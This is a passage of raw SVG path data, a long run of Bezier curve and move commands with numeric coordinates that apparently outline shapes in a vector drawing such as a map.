771.0748,169.91595 770.63053,169.20211 C 770.18627,168.48828 770.05769,167.29204 770.34481,166.54381 C 770.66856,165.70016 769.94251,164.9514 768.43343,164.57265 C 767.09504,164.23673 766,163.29928 766,162.48942 C 766,161.67956 765.1,160.45489 764,159.76793 C 761.68524,158.32233 761.38787,157 763.37756,157 C 764.13521,157 765.31531,156.325 766,155.5 C 766.68469,154.675 768.04164,154 769.01546,154 C 770.99609,154 772.63272,151.04367 770.71862,150.92349 C 770.04838,150.88141 768.64615,150.68649 767.60257,150.49033 C 765.50717,150.09648 758,153.02472 758,154.2359 C 758,154.65616 756.90532,155 755.56739,155 C 752.71278,155 750.93775,158.72546 753.14299,160.08837 C 753.88934,160.54965 754.3875,161.16846 754.25,161.46353 C 753.17653,163.76707 757.56858,169.853 761.35228,171.30494 C 762.25853,171.6527 763,172.38723 763,172.93723 C 763,173.48723 762.325,173.67821 761.5,173.36163 C 760.46758,172.96545 760,173.42442 760,174.83399 C 760,175.96038 759.55,177.16008 759,177.5 C 758.45,177.83992 758.00043,178.87898 758.00095,179.80902 C 758.0021,181.84935 767.51532,186.17005 770.5,185.48581 C 771.6,185.23364 773.0625,185.02116 773.75,185.01365 z M 685.73097,171.30701 C 684.758,171.05347 683.408,171.07014 682.73097,171.34406 C 682.05394,171.61799 682.85,171.82543 684.5,171.80505 C 686.15,171.78467 686.70394,171.56055 685.73097,171.30701 z M 698.25967,168.0093 C 701.5852,166.04719 709.98334,165.53518 709.99482,167.29384 C 709.99767,167.73045 710.5625,167.99578 711.25,167.88347 C 711.9375,167.77115 713.76679,168.20143 715.3151,168.83963 C 718.61597,170.20023 728.8795,170.36227 730.89572,169.08561 C 732.62143,167.9929 731.66879,165.18453 729.27268,164.30094 C 728.29771,163.9414 726.15,162.66568 724.5,161.466 C 717.94177,156.69766 715.51087,156.04626 709.84862,157.53993 C 704.64684,158.91214 702.45474,158.69127 703.55802,156.90613 C 703.88287,156.3805 703.77771,156.01489 703.32433,156.09364 C 700.73623,156.54323 699.78807,155.96028 700.90955,154.60898 C 701.83728,153.49114 701.45633,153.00613 698.96983,152.13933 C 695.4859,150.92482 692.38849,152.20062 691.4211,155.24859 C 691.115,156.21303 689.99503,157.46748 688.93228,158.03625 C 687.86952,158.60501 687,159.95453 687,161.03518 C 687,162.11583 686.59814,163 686.10699,163 C 684.69193,163 683.83026,166.23026 684.94735,167.34735 C 685.50445,167.90445 687.8817,168.67288 690.23013,169.05497 C 692.57856,169.43705 694.58678,169.80599 694.69284,169.87483 C 694.7989,169.94368 696.40398,169.10418 698.25967,168.0093 z M 800.72038,157.34713 C 801.68512,156.44157 801.61874,156.06767 800.41092,155.60419 C 799.56519,155.27965 799.15332,154.56095 799.49563,154.00706 C 799.83795,153.45318 799.45328,153 798.6408,153 C 795.90098,153 794.12286,154.15659 794.67013,155.58276 C 794.96925,156.36224 794.71583,157 794.10699,157 C 793.49814,157 792.98632,156.2125 792.96959,155.25 C 792.94127,153.62001 792.86695,153.62418 791.88591,155.31074 C 788.79771,160.61983 795.57055,162.181 800.72038,157.34713 z M 718.46574,153.22869 C 719.29263,151.07385 718.05998,149.84619 715.7922,150.56595 C 714.67048,150.92197 713.24585,151.29043 712.62635,151.38475 C 710.77404,151.66677 708.93566,153.08688 709.41625,153.86449 C 710.26452,155.23702 717.90095,154.7005 718.46574,153.22869 z M 1084,128.94098 C 1084,128.42344 1083.625,128 1083.1667,128 C 1082.7083,128 1082.3333,128.65521 1082.3333,129.45601 C 1082.3333,130.25682 1082.7083,130.68026 1083.1667,130.39699 C 1083.625,130.11373 1084,129.45852 1084,128.94098 z M 635.2724,123.2253 C 636.3635,124.59966 637.22274,124.61432 643,123.35721 C 646.575,122.5793 650.59368,122.13381 651.9304,122.36723 C 656.06729,123.08962 659.95718,120.19438 659.98469,116.37244 C 659.99311,115.20229 660.69548,113.66769 661.54551,112.96223 C 662.39554,112.25677 662.85966,111.07667 662.57689,110.33979 C 662.29413,109.6029 662.5252,109 663.0904,109 C 663.6556,109 663.87466,108.60621 663.57719,108.1249 C 663.27973,107.6436 664.82817,106.96328 667.01818,106.61308 C 669.20818,106.26289 671,105.52311 671,104.96913 C 671,104.41048 669.95062,104.22527 668.64376,104.55328 C 667.23844,104.90599 665.72142,104.57856 664.88483,103.74197 C 664.11335,102.97049 662.92366,102.52545 662.24107,102.75298 C 661.55848,102.98051 660.97407,102.79167 660.94238,102.33333 C 660.9107,101.875 660.71538,99.903531 660.50834,97.952291 C 660.0412,93.549574 660.51179,92.85175 665.5,90.550217 C 667.7,89.535149 670.51215,87.919107 671.74922,86.959011 C 673.65004,85.483779 673.75355,85.119405 672.41744,84.606691 C 668.40191,83.065787 658.988,85.638482 661.94798,87.467853 C 663.36671,88.344675 658.01476,91.979506 655.22583,92.033269 C 653.12117,92.073841 649.69872,94.825909 648.14682,97.725663 C 646.73153,100.37016 646.71006,101 648.03518,101 C 648.60453,101 650.15815,101.71274 651.48766,102.58387 L 653.90496,104.16774 L 651.70248,106.45205 C 650.49111,107.70842 649.25351,108.60037 648.95225,108.43416 C 648.10284,107.96553 646.62115,109.28297 645.26463,111.713 C 644.18736,113.64279 644.2424,113.84421 645.69466,113.28693 C 647.2309,112.69742 647.22827,112.836 645.66077,115.07393 C 643.90914,117.57474 643.71192,117.6644 639.5,117.875 C 638.02493,117.94875 637,118.60209 637,119.46862 C 637,120.36321 637.58629,120.71225 638.5,120.36163 C 639.325,120.04504 640,120.28417 640,120.89301 C 640,122.17799 639.88964,122.18146 634.17253,121.07656 C 630.83158,120.43087 629.72434,120.55479 629.31554,121.62011 C 629.0243,122.37905 628.15917,123 627.39301,123 C 626.62686,123 626,123.4138 626,123.91955 C 626,124.42531 627.81008,124.12809 630.0224,123.25906 C 633.6491,121.83446 634.16557,121.83114 635.2724,123.2253 z M 649.18689,113.25 C 649.37443,112.26606 650.61032,111.35273 652.01022,111.16358 L 654.5,110.82716 L 652.29181,112.91358 C 649.59779,115.45905 648.74832,115.55109 649.18689,113.25 z M 656,104 C 655.20686,103.50981 654.88989,102.77678 655.29563,102.37104 C 655.70137,101.9653 656.55833,102.15833 657.2,102.8 C 658.71091,104.31091 657.86759,105.15423 656,104 z M 624.49292,118.01145 C 624.84326,117.44459 624.44186,117.27695 623.55194,117.61844 C 621.81952,118.28323 621.50255,119 622.94098,119 C 623.45852,119 624.1569,118.55515 624.49292,118.01145 z M 670.81311,112.25 C 670.62966,111.2875 669.47167,110.3562 668.23978,110.18045 C 665.77789,109.82921 665.33784,110.93784 667.2,112.8 C 668.99145,114.59145 671.19543,114.25595 670.81311,112.25 z M 687.18307,103.86569 C 688.15366,103.25024 687.97402,102.99482 686.5,102.89448 C 681.75174,102.57125 673.07935,103.62577 672.02391,104.65471 C 671.16972,105.48745 685.82876,104.72447 687.18307,103.86569 z M 1162,96.531385 C 1162,95.639301 1161.4134,95.287868 1160.5057,95.63617 C 1159.6839,95.95154 1159.2605,96.612416 1159.5648,97.104785 C 1160.4374,98.516708 1162,98.148774 1162,96.531385 z M 858.5,74 C 858.16008,73.45 857.34602,73.006891 856.69098,73.015313 C 855.97537,73.024514 856.09871,73.41754 857,74 C 858.92112,75.241525 859.2673,75.241525 858.5,74 z M 878.73075,65.075656 C 878.61562,63.54736 878.21679,63.348791 876.79289,64.110839 C 874.61956,65.273971 874.41135,66.163115 876.5,65.361626 C 877.325,65.045044 878,65.284167 878,65.893011 C 878,66.501855 878.19703,67 878.43785,67 C 878.67867,67 878.81047,66.134045 878.73075,65.075656 z M 976.5,54 C 976.83992,53.45 976.66803,53 976.11803,53 C 975.56803,53 974.83992,53.45 974.5,54 C 974.16008,54.55 974.33197,55 974.88197,55 C 975.43197,55 976.16008,54.55 976.5,54 z M 742.25,403.96969 C 741.0125,403.47181 739.98025,402.26245 739.95611,401.28222 C 739.93197,400.302 739.26869,397.7 738.48215,395.5 C 737.13052,391.71938 737.18103,391.31817 739.40312,388.18464 C 741.46441,385.27788 741.63109,384.38442 740.75556,380.93512 C 739.43695,375.74018 741.03911,371.89646 745.27474,370.09324 C 749.0989,368.46519 754,364.13606 754,362.38623 C 754,361.70446 754.78669,360.99515 755.7482,360.80997 C 756.70972,360.6248 757.49722,359.61805 757.4982,358.57274 C 757.50334,353.14023 762.64527,359.94007 763.11458,366 C 763.36877,369.28216 762.03195,374 760.84776,374 C 760.33327,374 760.02062,374.5625 760.15297,375.25 C 760.28533,375.9375 758.47234,382.41629 756.1241,389.64732 C 752.5787,400.56483 751.48531,402.87505 749.67729,403.26873 C 748.47978,403.52947 746.825,403.99754 746,404.30887 C 745.175,404.62021 743.4875,404.46758 742.25,403.96969 z M 1168.5,391.83574 C 1165.8813,390.39097 1161,385.84118 1161,384.84513 C 1161,384.41576 1161.7875,384.38745 1162.75,384.78222 C 1165.3468,385.84734 1172.9182,391.38408 1172.962,392.25 C 1173.0164,393.32462 1170.8308,393.1217 1168.5,391.83574 z M 1175,390 C 1175,389.45 1175.45,389 1176,389 C 1176.55,389 1177,389.45 1177,390 C 1177,390.55 1176.55,391 1176,391 C 1175.45,391 1175,390.55 1175,390 z M 780.45888,388.93347 C 780.09635,388.34688 780.03985,387.62682 780.33333,387.33333 C 781.04965,386.61702 783,387.87916 783,389.05902 C 783,390.33699 781.27359,390.25169 780.45888,388.93347 z M 1172,388.05902 C 1172,387.54148 1172.45,386.83992 1173,386.5 C 1173.55,386.16008 1174,386.58352 1174,387.44098 C 1174,388.29844 1173.55,389 1173,389 C 1172.45,389 1172,388.57656 1172,388.05902 z M 787.125,386.125 C 787.54325,384.87026 789,384.57891 789,385.75 C 789,386.1625 788.49375,386.66875 787.875,386.875 C 787.25625,387.08125 786.91875,386.74375 787.125,386.125 z M 1180,383.05902 C 1180,382.47656 1180.45,382 1181,382 C 1182.2814,382 1182.2814,382.70806 1181,383.5 C 1180.45,383.83992 1180,383.64148 1180,383.05902 z M 1210.5,381 C 1211.2997,379.70609 1213,379.70609 1213,381 C 1213,381.55 1212.2984,382 1211.441,382 C 1210.5835,382 1210.1601,381.55 1210.5,381 z M 1179,380 C 1179,378.71862 1179.7081,378.71862 1180.5,380 C 1180.8399,380.55 1180.6415,381 1180.059,381 C 1179.4766,381 1179,380.55 1179,380 z M 1208.4815,377.97005 C 1208.0925,377.34068 1208.2273,376.37274 1208.7809,375.81909 C 1210.2015,374.39848 1213.5,375.23347 1213.5,377.0137 C 1213.5,378.81153 1209.4755,379.57845 1208.4815,377.97005 z M 61.582949,377.13421 C 61.152178,376.43721 61.06979,375.59688 61.399864,375.2668 C 62.294825,374.37184 63.270632,375.6881 62.787251,377.13825 C 62.448526,378.15442 62.212984,378.15363 61.582949,377.13421 z M 1176,376 C 1176,375.45 1176.45,375 1177,375 C 1177.55,375 1178,375.45 1178,376 C 1178,376.55 1177.55,377 1177,377 C 1176.45,377 1176,376.55 1176,376 z M 1212.4943,374.16098 C 1211.5262,373.19291 1212.0258,372.22585 1213.75,371.73008 C 1214.7125,371.45334 1216.2875,370.90271 1217.25,370.50646 C 1218.5724,369.96207 1219,370.27316 1219,371.77951 C 1219,373.23083 1218.1825,373.89298 1215.9943,374.21414 C 1214.3412,374.45677 1212.7662,374.43285 1212.4943,374.16098 z M 1174.8371,373.32745 C 1173.1853,372.88984 1169.403,366.2637 1170.2955,365.37117 C 1170.552,365.11465 1171.5237,365.66658 1172.4548,366.5977 C 1173.6652,367.80805 1173.8176,368.49472 1172.9894,369.00658 C 1172.2359,369.47223 1172.5413,369.90828 1173.8628,370.25388 C 1175.2273,370.61071 1176.0129,370.24572 1176.2544,369.14261 C 1176.4523,368.23918 1176.848,368.9625 1177.1339,370.75 C 1177.4197,372.5375 1177.3941,373.9478 1177.0768,373.884 C 1176.7596,373.8202 1175.7517,373.56975 1174.8371,373.32745 z M 1243.4411,362.5318 C 1241.8893,361.35803 1241.8126,361.05723 1243.0589,361.0318 C 1243.9162,361.01431 1245.4912,361.66069 1246.5589,362.4682 C 1248.1107,363.64197 1248.1874,363.94277 1246.9411,363.9682 C 1246.0838,363.98569 1244.5088,363.33931 1243.4411,362.5318 z M 741,357.55902 C 741,357.31648 741.45,356.83992 742,356.5 C 742.55,356.16008 743,356.35852 743,356.94098 C 743,357.52344 742.55,358 742,358 C 741.45,358 741,357.80156 741,357.55902 z M 737.54271,356.0691 C 737.22627,355.5571 737.42472,354.85554 737.98369,354.51008 C 738.54266,354.16462 739,354.58352 739,355.44098 C 739,357.19751 738.39994,357.45614 737.54271,356.0691 z M 1124,355 C 1123.0987,354.41754 1122.9754,354.02451 1123.691,354.01531 C 1124.346,354.00689 1125.1601,354.45 1125.5,355 C 1126.2673,356.24153 1125.9211,356.24153 1124,355 z M 1147,355 C 1147,353.70609 1148.7003,353.70609 1149.5,355 C 1149.8399,355.55 1149.4165,356 1148.559,356 C 1147.7016,356 1147,355.55 1147,355 z M 1018.6439,350.01207 C 1019.4637,348.36871 1020.8917,346.5824 1021.8172,346.04248 C 1023.2052,345.23278 1023.2372,345.03532 1022,344.91525 C 1020.4225,344.76217 1017.5213,345.02058 1015,345.53872 C 1014.175,345.70826 1012.1928,345.88141 1010.595,345.92349 C 1007.7645,345.99804 1007.7359,346.05073 1009.4811,347.97915 C 1011.1733,349.84894 1011.1763,349.99513 1009.5352,350.62487 C 1008.5798,350.99148 1007.5061,350.85554 1007.1491,350.32278 C 1006.7921,349.79001 1005.6,348.97027 1004.5,348.50112 C 1002.542,347.66601 1002.5449,347.64016 1004.6419,347.26867 C 1006.2401,346.98555 1006.6483,346.37116 1006.2501,344.84837 C 1005.7533,342.94876 1006.0689,342.8406 1010.8097,343.28563 C 1013.6109,343.5486 1016.1201,343.54658 1016.3855,343.28115 C 1017.292,342.37464 1026,342.22132 1026,343.11187 C 1026,343.60034 1026.7875,343.99311 1027.75,343.98469 C 1029.1407,343.97252 1029.2156,343.78929 1028.1149,343.09217 C 1026.9994,342.38568 1027.1197,342.0063 1028.7334,341.14267 C 1031.0871,339.883 1032.4393,340.76571 1030.9342,342.57932 C 1030.1267,343.55232 1030.3944,343.70962 1032.0992,343.2638 C 1035.8424,342.28495 1033.3426,344.73368 1029.2361,346.06848 C 1027.1812,346.7364 1025.1571,347.86398 1024.7379,348.57422 C 1024.1267,349.61 1018.5237,353 1017.423,353 C 1017.2747,353 1017.824,351.65543 1018.6439,350.01207 z M 1152.4589,351.93347 C 1152.0963,351.34688 1152.0504,350.61628 1152.3567,350.30993 C 1153.1794,349.48729 1156,350.77145 1156,351.96862 C 1156,353.32587 1153.3029,353.2991 1152.4589,351.93347 z M 1167.5,352 C 1168.2997,350.70609 1170,350.70609 1170,352 C 1170,352.55 1169.2984,353 1168.441,353 C 1167.5835,353 1167.1601,352.55 1167.5,352 z M 1111.8643,351.53094 C 1111.6063,351.27296 1109.9197,350.94945 1108.1162,350.81203 C 1105.7797,350.63399 1103.8619,349.4827 1101.4442,346.80657 C 1097.3583,342.28393 1093.979,341.20086 1090.8318,343.40523 C 1089.5796,344.28235 1088.9926,345.01431 1089.5275,345.0318 C 1090.0624,345.0493 1089.6963,345.67325 1088.714,346.41837 C 1086.6497,347.98422 1080.8981,347.07035 1078.1769,344.74416 C 1077.1293,343.84866 1075.0926,343.4653 1072.75,343.72268 C 1068.825,344.15392 1067.9604,343.10769 1070.5,341 C 1072.5222,339.32173 1072.3884,337.76349 1069.9567,334.67204 C 1068.7256,333.10695 1066.4399,331.8035 1064.2067,331.39294 C 1062.168,331.01816 1060.222,330.28357 1059.8821,329.76053 C 1059.5423,329.23748 1057.6318,328.76326 1055.6367,328.70671 C 1053.0788,328.6342 1051.8404,328.07252 1051.4371,326.80194 C 1051.1226,325.81087 1050.4955,325 1050.0437,325 C 1049.5919,325 1049.2847,324.23164 1049.3611,323.29253 C 1049.4389,322.33676 1048.2893,320.992 1046.75,320.23796 C 1043.5974,318.69366 1043.219,317.35075 1045.75,316.68933 C 1047.0669,316.34518 1046.9432,316.20329 1045.25,316.116 C 1042.1606,315.95672 1042.3918,314 1045.5,314 C 1046.875,314 1048,314.40787 1048,314.90638 C 1048,315.40489 1048.9031,315.57659 1050.0069,315.28793 C 1051.1108,314.99928 1053.3238,315.30571 1054.9249,315.96889 C 1057.2405,316.92805 1057.7464,317.66812 1057.3984,319.58733 C 1057.1578,320.9143 1057.3894,322 1057.9131,322 C 1058.4367,322 1059.1509,322.9 1059.5,324 C 1060.317,326.57414 1061.6387,326.54358 1063.0439,323.91804 C 1063.9338,322.25518 1063.8289,321.59538 1062.5228,320.64033 C 1061.1828,319.6605 1061.8457,319.46145 1066.1938,319.53799 C 1069.1122,319.58936 1072.4,320.1051 1073.5,320.68407 C 1074.6,321.26304 1077.1682,322.03775 1079.2071,322.40565 C 1082.591,323.01621 1089.0497,325.43686 1094.7334,328.22473 C 1095.9618,328.82725 1097.2378,330.17395 1097.569,331.2174 C 1098.2764,333.44633 1103.2608,335.71757 1103.8125,334.06239 C 1104.0073,333.47808 1105.8917,333 1108,333 C 1110.1295,333 1112.0588,332.4444 1112.3405,331.75 C 1112.7328,330.78331 1113.0663,330.81235 1113.8121,331.87812 C 1114.9322,333.47888 1117,332.5467 1117,330.44098 C 1117,329.64844 1117.675,329 1118.5,329 C 1119.325,329 1120,328.60175 1120,328.11501 C 1120,326.90871 1115.4303,324 1113.5352,324 C 1112.6908,324 1112,323.55 1112,323 C 1112,321.71745 1112.1131,321.72901 1116.1279,323.42201 C 1120.7711,325.38005 1124.0669,328.66214 1123.3267,330.591 C 1122.8392,331.86155 1122.5575,331.9087 1121.8761,330.83385 C 1121.2431,329.83513 1121.0268,329.81406 1121.0153,330.75 C 1120.988,332.98249 1120.6285,333.47957 1118.0451,334.85695 C 1114.4852,336.75495 1109.8489,336.9918 1108.2162,335.35906 C 1106.5732,333.71601 1104.6334,334.60232 1105.415,336.639 C 1105.7182,337.42919 1105.3273,338.32092 1104.5463,338.62061 C 1102.8482,339.27224 1103.6499,342 1105.5396,342 C 1106.2687,342 1107.1529,342.90653 1107.5046,344.01452 C 1107.8563,345.12251 1108.5608,345.77146 1109.0702,345.45663 C 1109.5796,345.14181 1111.1783,346.14777 1112.6229,347.69211 C 1114.0676,349.23645 1114.6793,349.70163 1113.9823,348.72583 C 1112.1781,346.19997 1113.2924,345.6517 1115.8036,347.8297 C 1117.4193,349.23097 1117.6492,349.95076 1116.764,350.83604 C 1115.5961,352.00387 1112.742,352.40866 1111.8643,351.53094 z M 1147.75,349.25074 C 1146.7875,349.03218 1146,348.25348 1146,347.5203 C 1146,346.67613 1146.7392,346.38055 1148.0156,346.71433 C 1151.7642,347.69462 1151.5119,350.10498 1147.75,349.25074 z M 1151.2777,347.75 C 1149.7743,345.80709 1148.9698,343 1149.9164,343 C 1150.7376,343 1154,347.36579 1154,348.46482 C 1154,349.46502 1152.2489,349.00524 1151.2777,347.75 z M 1121,346 C 1121,344.70609 1122.7003,344.70609 1123.5,346 C 1123.8399,346.55 1123.4165,347 1122.559,347 C 1121.7016,347 1121,346.55 1121,346 z M 1137.7495,343.61725 C 1135.1041,341.50788 1133.8388,339.1643 1136.0998,340.56166 C 1136.8727,341.03937 1136.8623,340.61115 1136.0646,339.12068 C 1134.6296,336.43944 1136.1161,336.36578 1138.5,339 C 1139.7006,340.32667 1139.8838,341 1139.0442,341 C 1138.348,341 1138.8013,341.8283 1140.0515,342.84066 C 1141.3018,343.85302 1141.9139,344.93518 1141.4118,345.24547 C 1140.9098,345.55576 1139.2617,344.82306 1137.7495,343.61725 z M 1144.75,343.42803 C 1143.2375,342.60748 1142,341.52143 1142,341.01457 C 1142,340.50772 1143.3472,340.85959 1144.9937,341.79651 C 1146.6402,342.73343 1147.9902,343.8375 1147.9937,344.25 C 1148.0017,345.19988 1148.0286,345.20671 1144.75,343.42803 z M 1046.1545,341.44803 C 1046.3445,340.46777 1047.1055,339.46412 1047.8455,339.2177 C 1048.7061,338.93112 1049.0665,339.41195 1048.8455,340.55197 C 1048.6555,341.53223 1047.8945,342.53588 1047.1545,342.7823 C 1046.2939,343.06888 1045.9335,342.58805 1046.1545,341.44803 z M 1056,337.12244 C 1056,336.08979 1056.6697,334.68911 1057.4882,334.00982 C 1058.694,333.00908 1059.0947,333.08313 1059.6,334.40011 C 1060.2323,336.04778 1058.485,339 1056.8776,339 C 1056.3949,339 1056,338.1551 1056,337.12244 z M 1131.3997,338.23469 C 1130.0259,337.31735 1128,333.542 1128,331.89907 C 1128,330.294 1133.9358,336.10921 1133.9722,337.75 C 1134.0034,339.15152 1133.0436,339.33235 1131.3997,338.23469 z M 1008.5162,336.05103 C 1008.1419,334.87182 1007.3254,334.32164 1006.4488,334.65802 C 1005.3287,335.08786 1005,334.28231 1005,331.10699 C 1005,328.84814 1004.55,327 1004,327 C 1002.6072,327 1002.7465,325.08409 1004.5915,318.86483 C 1006.5678,312.20296 1007.5103,310.43057 1008.9069,310.75 C 1009.5081,310.8875 1010,310.5798 1010,310.06622 C 1010,309.18679 1010.9072,309.23456 1018.6115,310.51965 C 1020.6894,310.86625 1022.1419,310.53393 1022.984,309.51933 C 1023.6775,308.6837 1024.6398,308 1025.1224,308 C 1026.6115,308 1026.0958,309.90418 1024.0537,311.94632 C 1022.3616,313.63843 1021.1861,313.8154 1015.0537,313.30128 C 1008.8254,312.77912 1008,312.91078 1008,314.42639 C 1008,315.37045 1008.6468,316.78961 1009.4372,317.58009 C 1010.6869,318.82973 1011.092,318.72251 1012.5409,316.75866 C 1013.4795,315.4866 1014.3958,314.98252 1014.6386,315.60466 C 1014.8757,316.21222 1016.1791,316.49726 1017.5349,316.23808 C 1019.509,315.86071 1020,316.17667 1020,317.82441 C 1020,320.13969 1018.4538,321.5432 1017.5371,320.05999 C 1016.7385,318.76792 1014,319.87087 1014,321.48454 C 1014,322.18336 1014.67,323.3112 1015.489,323.99086 C 1016.3079,324.67053 1016.7294,325.6288 1016.4256,326.12037 C 1016.1218,326.61194 1016.5768,327.28409 1017.4366,327.61405 C 1019.1269,328.26269 1019.4956,331.66949 1018.1119,333.85325 C 1016.8735,335.80751 1013.1959,333.62862 1012.4034,330.47114 C 1012.0623,329.11201 1011.3338,328 1010.7846,328 C 1010.2354,328 1010.0395,327.33941 1010.3493,326.53203 C 1010.6592,325.72464 1010.4361,324.7695 1009.8536,324.40949 C 1009.1263,323.96001 1008.9748,325.98652 1009.37,330.87747 C 1009.9471,338.01895 1009.6713,339.69032 1008.5162,336.05103 z M 1052.0153,335.30902 C 1052.0237,334.86406 1052.4668,333.825 1053,333 C 1053.8354,331.70731 1053.9715,331.73371 1053.9847,333.19098 C 1053.9931,334.12102 1053.55,335.16008 1053,335.5 C 1052.45,335.83992 1052.0069,335.75398 1052.0153,335.30902 z M 988,328.7154 C 988,326.99059 984.74962,325.96383 980.72568,326.41752 C 979.1998,326.58956 977.72289,326.36065 977.44365,325.90883 C 977.16442,325.45702 976.34746,325.31317 975.62819,325.58918 C 974.08815,326.18015 972.33126,324.30105 971.84502,321.54284 C 971.65526,320.4664 970.77693,318.84334 969.89318,317.93602 C 968.86752,316.88301 968.325,314.69746 968.39318,311.89318 L 968.5,307.5 L 972.15671,307.66073 C 974.92407,307.78237 975.9282,307.38256 976.28534,306.01685 C 976.55459,304.98726 978.10281,303.91669 979.8903,303.52409 C 981.76074,303.11328 984.07394,301.45854 985.63036,299.41798 C 987.06422,297.53809 988.69411,296 989.25234,296 C 990.39183,296 994.99689,290.94411 994.99878,289.69098 C 994.99945,289.24602 995.41157,289.13633 995.91459,289.44721 C 996.41761,289.7581 997.05709,289.44716 997.33564,288.75623 C 997.72505,287.79033 997.86035,287.8054 997.92105,288.82143 C 998.01725,290.43167 999.79444,292.28444 1002.7706,293.87725 C 1005.6839,295.4364 1005.5852,296.27809 1002.1039,299.56396 C 999.49044,302.03061 999.31092,302.60018 1000.2648,305.39872 C 1000.8462,307.10442 1001.9244,308.85986 1002.6609,309.29969 C 1004.6851,310.50852 1004.2696,311.82261 1001.75,312.18045 C 1000.2171,312.39815 999.46361,313.22187 999.38582,314.76491 C 999.32302,316.01061 998.34551,317.83304 997.21358,318.81477 C 996.08164,319.79649 995.19141,321.25228 995.23529,322.04986 C 995.49902,326.84357 994.90289,328.87174 993.25,328.80433 C 992.2875,328.76508 990.7125,329.06619 989.75,329.47347 C 988.53242,329.98869 988,329.75805 988,328.7154 z M 1028.7012,327.3679 C 1027.2951,325.96173 1028.0595,325 1030.5833,325 C 1032.2053,325 1033.0118,325.46517 1032.7505,326.25 C 1032.2691,327.69569 1029.73,328.39668 1028.7012,327.3679 z M 1034.6732,326.59065 C 1033.8809,324.52616 1034.8702,324 1039.5442,324 C 1042.097,324 1044.2532,324.60018 1045.0201,325.52417 C 1046.6887,327.53481 1045.6738,328.431 1043.2171,327.1162 C 1042.1423,326.54099 1041.0913,326.21623 1040.8815,326.39451 C 1040.6717,326.57278 1039.3094,327.00375 1037.8543,327.35221 C 1036.0521,327.78377 1035.0378,327.54096 1034.6732,326.59065 z M 938.07895,326.2587 C 938.03553,325.57598 936.71085,323.77598 935.13521,322.2587 C 933.55958,320.74141 931.9381,318.375 931.53193,317 L 930.79343,314.5 L 932.64672,316.83977 C 933.66602,318.12665 935.55071,320.48702 936.83491,322.08504 C 938.11911,323.68306 938.94214,325.55516 938.66386,326.24527 C 938.26681,327.2299 938.1409,327.23279 938.07895,326.2587 z M 963,324.57332 C 963,323.64569 963.855,323 965.08333,323 C 967.52038,323 967.1759,325.33677 964.66713,325.82332 C 963.68037,326.0147 963,325.50456 963,324.57332 z M 1027.5,323 C 1027.1601,322.45 1025.7835,322 1024.441,322 C 1023.0984,322 1022,321.55 1022,321 C 1022,320.45 1023.7579,320 1025.9064,320 C 1029.3204,320 1029.7468,320.25206 1029.2897,322 C 1028.6995,324.25708 1028.3854,324.43259 1027.5,323 z M 1100,322 C 1100,321.45 1100.9266,321 1102.059,321 C 1103.1915,321 1103.8399,321.45 1103.5,322 C 1102.6976,323.29836 1100,323.29836 1100,322 z M 1041.5,321 C 1041.1601,320.45 1041.8085,320 1042.941,320 C 1044.0734,320 1045,320.45 1045,321 C 1045,322.29836 1042.3024,322.29836 1041.5,321 z M 1033.3149,319.62186 C 1033.6057,318.86388 1033.3164,317.68263 1032.6719,316.99686 C 1031.7759,316.04356 1031.7772,315.64778 1032.6775,315.31582 C 1033.404,315.04795 1033.656,313.65505 1033.3354,311.67921 C 1032.9428,309.25988 1033.3288,308.01243 1034.914,306.57785 C 1037.3004,304.4182 1038.9526,305.14722 1037.0011,307.49873 C 1035.911,308.81222 1035.9825,308.94395 1037.4749,308.37126 C 1038.9739,307.79605 1039.0752,307.99097 1038.1631,309.69517 C 1037.3817,311.15523 1037.4177,312.03456 1038.2968,312.9592 C 1039.2579,313.97015 1039.0069,314.07518 1037.049,313.48123 C 1034.6142,312.74254 1034.6093,312.75472 1036.3024,315.33872 C 1037.711,317.4886 1037.7459,317.83972 1036.5033,317.3629 C 1034.7025,316.67187 1034.522,318.12203 1036.2,319.8 C 1037.1333,320.73333 1036.8873,321 1035.093,321 C 1033.5439,321 1032.9597,320.54729 1033.3149,319.62186 z M 265.25,318.28172 C 263.84614,317.77814 263.54789,314.39745 264.83703,313.60072 C 265.90893,312.93825 270,315.77375 270,317.17915 C 270,317.81262 269.31374,317.68822 268.30804,316.87244 C 267.34416,316.09059 266.92086,316.00816 267.32435,316.6809 C 268.15357,318.06346 267.03912,318.9235 265.25,318.28172 z M 1062.029,318.03906 C 1061.2199,317.52739 1060.8931,316.77356 1061.3028,316.3639 C 1061.7124,315.95423 1062.8083,316.37976 1063.7381,317.30952 C 1065.5455,319.11691 1064.4635,319.57873 1062.029,318.03906 z M 271,317.55902 C 271,317.31648 271.45,316.83992 272,316.5 C 272.55,316.16008 273,316.35852 273,316.94098 C 273,317.52344 272.55,318 272,318 C 271.45,318 271,317.80156 271,317.55902 z M 608.54271,314.0691 C 608.22627,313.5571 608.42472,312.85554 608.98369,312.51008 C 609.54266,312.16462 610,312.58352 610,313.44098 C 610,315.19751 609.39994,315.45614 608.54271,314.0691 z M 927.78167,311.05797 C 926.84514,309.96419 926.46015,308.83364 926.92614,308.54565 C 928.00802,307.87701 930.30262,310.59215 929.83676,311.98971 C 929.64299,312.57104 928.71819,312.15176 927.78167,311.05797 z M 33.5,308 C 33.160081,307.45 33.358524,307 33.940983,307 C 34.523442,307 35,307.45 35,308 C 35,309.28138 34.291939,309.28138 33.5,308 z M 923,306 C 922.20686,305.50981 921.88989,304.77678 922.29563,304.37104 C 922.70137,303.9653 923.55833,304.15833 924.2,304.8 C 925.71091,306.31091 924.86759,307.15423 923,306 z M 1026,302 C 1026,301.45 1026.45,301 1027,301 C 1027.55,301 1028,301.45 1028,302 C 1028,302.55 1027.55,303 1027,303 C 1026.45,303 1026,302.55 1026,302 z M 965,301.05902 C 965,300.54148 965.45,299.83992 966,299.5 C 966.55,299.16008 967,299.58352 967,300.44098 C 967,301.29844 966.55,302 966,302 C 965.45,302 965,301.57656 965,301.05902 z M 1030,300.05902 C 1030,299.54148 1030.45,298.83992 1031,298.5 C 1031.55,298.16008 1032,298.58352 1032,299.44098 C 1032,300.29844 1031.55,301 1031,301 C 1030.45,301 1030,300.57656 1030,300.05902 z M 1006.5,296 C 1007.2997,294.70609 1009,294.70609 1009,296 C 1009,296.55 1008.2984,297 1007.441,297 C 1006.5835,297 1006.1601,296.55 1006.5,296 z M 1023.25,293.32558 C 1021.8962,292.38119 1020.9939,290.70933 1020.9847,289.12803 C 1020.9741,287.31851 1020.7074,286.91324 1020.1282,287.82679 C 1019.6656,288.55653 1018.435,289.00653 1017.3935,288.82679 C 1016.0962,288.6029 1015.5437,289.05105 1015.6389,290.25 C 1015.7153,291.2125 